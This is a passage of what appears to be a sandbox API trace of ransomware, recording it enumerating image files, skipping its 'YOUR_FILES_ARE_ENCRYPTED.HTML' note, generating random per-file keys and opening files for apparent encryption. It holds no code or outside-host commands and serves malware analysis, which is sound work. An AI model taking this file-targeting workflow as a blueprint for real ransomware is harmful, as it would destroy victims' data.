param_1=0x4ebd78a, param_2="%02X" | out: param_1="F6") returned 2 [0168.153] wsprintfW (in: 
param_1=0x4ebd78e, param_2="%02X" | out: param_1="C2") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="62") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="00") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="89") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8D") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="C9") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="3E") returned 2 [0168.154] lstrcpyW (in: lpString1=0x751a224, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png" [0168.154] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, CompletionKey=0x750a170, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.154] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a170, lpOverlapped=0x750a170) returned 1 [0168.154] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eb243d0, ftCreationTime.dwHighDateTime=0x1d7e52e, ftLastAccessTime.dwLowDateTime=0xf2819160, ftLastAccessTime.dwHighDateTime=0x1d7e6ac, ftLastWriteTime.dwLowDateTime=0xf2819160, ftLastWriteTime.dwHighDateTime=0x1d7e6ac, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x60, cFileName="axKsNotAR2.png", cAlternateFileName="AXKSNO~1.PNG")) returned 1 [0168.154] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png") returned 60 [0168.154] lstrcmpW (lpString1="axKsNotAR2.png", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.154] PathFindExtensionW (pszPath="axKsNotAR2.png") returned=".png" [0168.154] lstrlenW (lpString=".png") returned 4 [0168.154] PathFindExtensionW (pszPath="axKsNotAR2.png") returned=".png" [0168.154] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\axksnotar2.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0168.155] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=1488) returned 1 [0168.155] GetProcessHeap () returned 0x270000 [0168.155] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75322c8 [0168.158] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="FC") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="F5") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="07") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="D1") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="9E") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="9A") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="02") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="69") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="DD") returned 2 [0168.158] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="CA") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="0E") returned 2 [0168.159] 
wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="89") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="08") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="44") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="0D") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="F6") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="AE") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="CE") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="3B") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="AF") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="52") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="96") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B3") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="34") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="77") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="A6") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="78") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="94") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="43") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="4C") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="18") returned 2 [0168.159] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="54") returned 2 [0168.160] lstrcpyW (in: lpString1=0x754237c, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png" [0168.160] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x75322c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.160] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75322c8, lpOverlapped=0x75322c8) returned 1 [0168.160] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e10d30, ftCreationTime.dwHighDateTime=0x1d7d824, ftLastAccessTime.dwLowDateTime=0x12e3c8a0, ftLastAccessTime.dwHighDateTime=0x1d7db55, ftLastWriteTime.dwLowDateTime=0x12e3c8a0, ftLastWriteTime.dwHighDateTime=0x1d7db55, nFileSizeHigh=0x0, nFileSizeLow=0x11e9c, dwReserved0=0x0, dwReserved1=0x60, cFileName="BiDOMKYS_7eYkJlO7mV.png", cAlternateFileName="BIDOMK~1.PNG")) returned 1 [0168.160] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png") returned 69 [0168.160] lstrcmpW (lpString1="BiDOMKYS_7eYkJlO7mV.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.160] PathFindExtensionW (pszPath="BiDOMKYS_7eYkJlO7mV.png") returned=".png" [0168.160] lstrlenW (lpString=".png") returned 4 [0168.160] PathFindExtensionW (pszPath="BiDOMKYS_7eYkJlO7mV.png") returned=".png" [0168.160] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\bidomkys_7eykjlo7mv.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d4 [0168.161] GetFileSizeEx (in: hFile=0x5d4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=73372) returned 1 [0168.161] GetProcessHeap () returned 0x270000 [0168.161] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a420 [0168.165] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="53") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="5E") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="A6") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="82") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="CC") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="C0") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="BA") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="57") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="12") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="77") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E0") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="31") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="31") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="FC") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="83") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="01") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F4") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | 
out: param_1="96") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="FD") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="C9") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="87") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="07") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="59") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="06") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="42") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="62") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="E1") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="AE") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="86") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="B7") returned 2 [0168.165] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="45") returned 2 [0168.166] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="12") returned 2 [0168.166] lstrcpyW (in: lpString1=0x756a4d4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png" [0168.166] CreateIoCompletionPort (FileHandle=0x5d4, ExistingCompletionPort=0x3a0, CompletionKey=0x755a420, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.166] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a420, lpOverlapped=0x755a420) returned 1 [0168.166] FindNextFileW (in: 
hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x936540, ftCreationTime.dwHighDateTime=0x1d7dd79, ftLastAccessTime.dwLowDateTime=0xaf5ab820, ftLastAccessTime.dwHighDateTime=0x1d7e50e, ftLastWriteTime.dwLowDateTime=0xaf5ab820, ftLastWriteTime.dwHighDateTime=0x1d7e50e, nFileSizeHigh=0x0, nFileSizeLow=0x18b4a, dwReserved0=0x0, dwReserved1=0x60, cFileName="DZm0D9mWkUWh0_9o4.gif", cAlternateFileName="DZM0D9~1.GIF")) returned 1 [0168.166] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif") returned 67 [0168.166] lstrcmpW (lpString1="DZm0D9mWkUWh0_9o4.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.166] PathFindExtensionW (pszPath="DZm0D9mWkUWh0_9o4.gif") returned=".gif" [0168.166] lstrlenW (lpString=".gif") returned 4 [0168.166] PathFindExtensionW (pszPath="DZm0D9mWkUWh0_9o4.gif") returned=".gif" [0168.166] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\dzm0d9mwkuwh0_9o4.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d0 [0168.167] GetFileSizeEx (in: hFile=0x5d0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=101194) returned 1 [0168.167] GetProcessHeap () returned 0x270000 [0168.167] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7582578 [0168.171] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="AF") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0C") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd732, 
param_2="%02X" | out: param_1="1C") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="C2") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="68") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="F9") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="B1") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="F3") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="06") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="EB") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="44") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="08") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="14") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="62") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="06") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="9C") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="FF") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B3") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="D3") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="92") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FB") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="24") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="EF") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="F0") returned 2 [0168.171] wsprintfW 
(in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="68") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="3F") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="F1") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="D9") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="E5") returned 2 [0168.171] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="37") returned 2 [0168.172] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="A6") returned 2 [0168.172] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="00") returned 2 [0168.172] lstrcpyW (in: lpString1=0x759262c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif" [0168.172] CreateIoCompletionPort (FileHandle=0x5d0, ExistingCompletionPort=0x3a0, CompletionKey=0x7582578, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.172] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7582578, lpOverlapped=0x7582578) returned 1 [0168.172] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88f5dc10, ftCreationTime.dwHighDateTime=0x1d7de46, ftLastAccessTime.dwLowDateTime=0x692c8460, ftLastAccessTime.dwHighDateTime=0x1d7e5b7, ftLastWriteTime.dwLowDateTime=0x692c8460, ftLastWriteTime.dwHighDateTime=0x1d7e5b7, nFileSizeHigh=0x0, nFileSizeLow=0x60c4, dwReserved0=0x0, dwReserved1=0x60, cFileName="lbEjiajxw4W.bmp", cAlternateFileName="LBEJIA~1.BMP")) returned 1 [0168.172] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\lbEjiajxw4W.bmp") returned 61 [0168.172] lstrcmpW (lpString1="lbEjiajxw4W.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.172] PathFindExtensionW (pszPath="lbEjiajxw4W.bmp") returned=".bmp" [0168.172] lstrlenW (lpString=".bmp") returned 4 [0168.172] PathFindExtensionW (pszPath="lbEjiajxw4W.bmp") returned=".bmp" [0168.172] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3526a9f0, ftCreationTime.dwHighDateTime=0x1d7e5fa, ftLastAccessTime.dwLowDateTime=0xb25a7480, ftLastAccessTime.dwHighDateTime=0x1d7e788, ftLastWriteTime.dwLowDateTime=0xb25a7480, ftLastWriteTime.dwHighDateTime=0x1d7e788, nFileSizeHigh=0x0, nFileSizeLow=0x15a41, dwReserved0=0x0, dwReserved1=0x60, cFileName="mVHSolkg25ErZnMeoaY9.jpg", cAlternateFileName="MVHSOL~1.JPG")) returned 1 [0168.172] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg") returned 70 [0168.172] lstrcmpW (lpString1="mVHSolkg25ErZnMeoaY9.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.172] PathFindExtensionW (pszPath="mVHSolkg25ErZnMeoaY9.jpg") returned=".jpg" [0168.173] lstrlenW (lpString=".jpg") returned 4 [0168.173] PathFindExtensionW (pszPath="mVHSolkg25ErZnMeoaY9.jpg") returned=".jpg" [0168.173] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\mvhsolkg25erznmeoay9.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0168.173] GetFileSizeEx (in: hFile=0x5cc, 
lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=88641) returned 1 [0168.173] GetProcessHeap () returned 0x270000 [0168.173] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa6d0 [0168.177] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="FA") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D3") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="11") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="3C") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="82") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="AA") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="3C") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="65") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="B4") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="70") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="17") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="48") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="66") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="9F") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="AC") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="21") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="3E") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="39") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="F4") returned 2 [0168.177] wsprintfW (in: 
param_1=0x4ebd776, param_2="%02X" | out: param_1="9B") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="34") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="E5") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="EC") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="3A") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="38") returned 2 [0168.177] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="89") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="8F") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="26") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="95") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="32") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="34") returned 2 [0168.178] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="06") returned 2 [0168.178] lstrcpyW (in: lpString1=0x75ba784, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg" [0168.178] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa6d0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.178] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa6d0, lpOverlapped=0x75aa6d0) returned 1 [0168.178] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4538a80, 
ftCreationTime.dwHighDateTime=0x1d7e358, ftLastAccessTime.dwLowDateTime=0x1768660, ftLastAccessTime.dwHighDateTime=0x1d7e4d9, ftLastWriteTime.dwLowDateTime=0x1768660, ftLastWriteTime.dwHighDateTime=0x1d7e4d9, nFileSizeHigh=0x0, nFileSizeLow=0x1454a, dwReserved0=0x0, dwReserved1=0x60, cFileName="OEA6GlM0U9_7N3aR.gif", cAlternateFileName="OEA6GL~1.GIF")) returned 1 [0168.178] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif") returned 66 [0168.178] lstrcmpW (lpString1="OEA6GlM0U9_7N3aR.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.178] PathFindExtensionW (pszPath="OEA6GlM0U9_7N3aR.gif") returned=".gif" [0168.178] lstrlenW (lpString=".gif") returned 4 [0168.178] PathFindExtensionW (pszPath="OEA6GlM0U9_7N3aR.gif") returned=".gif" [0168.179] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\oea6glm0u9_7n3ar.gif"), 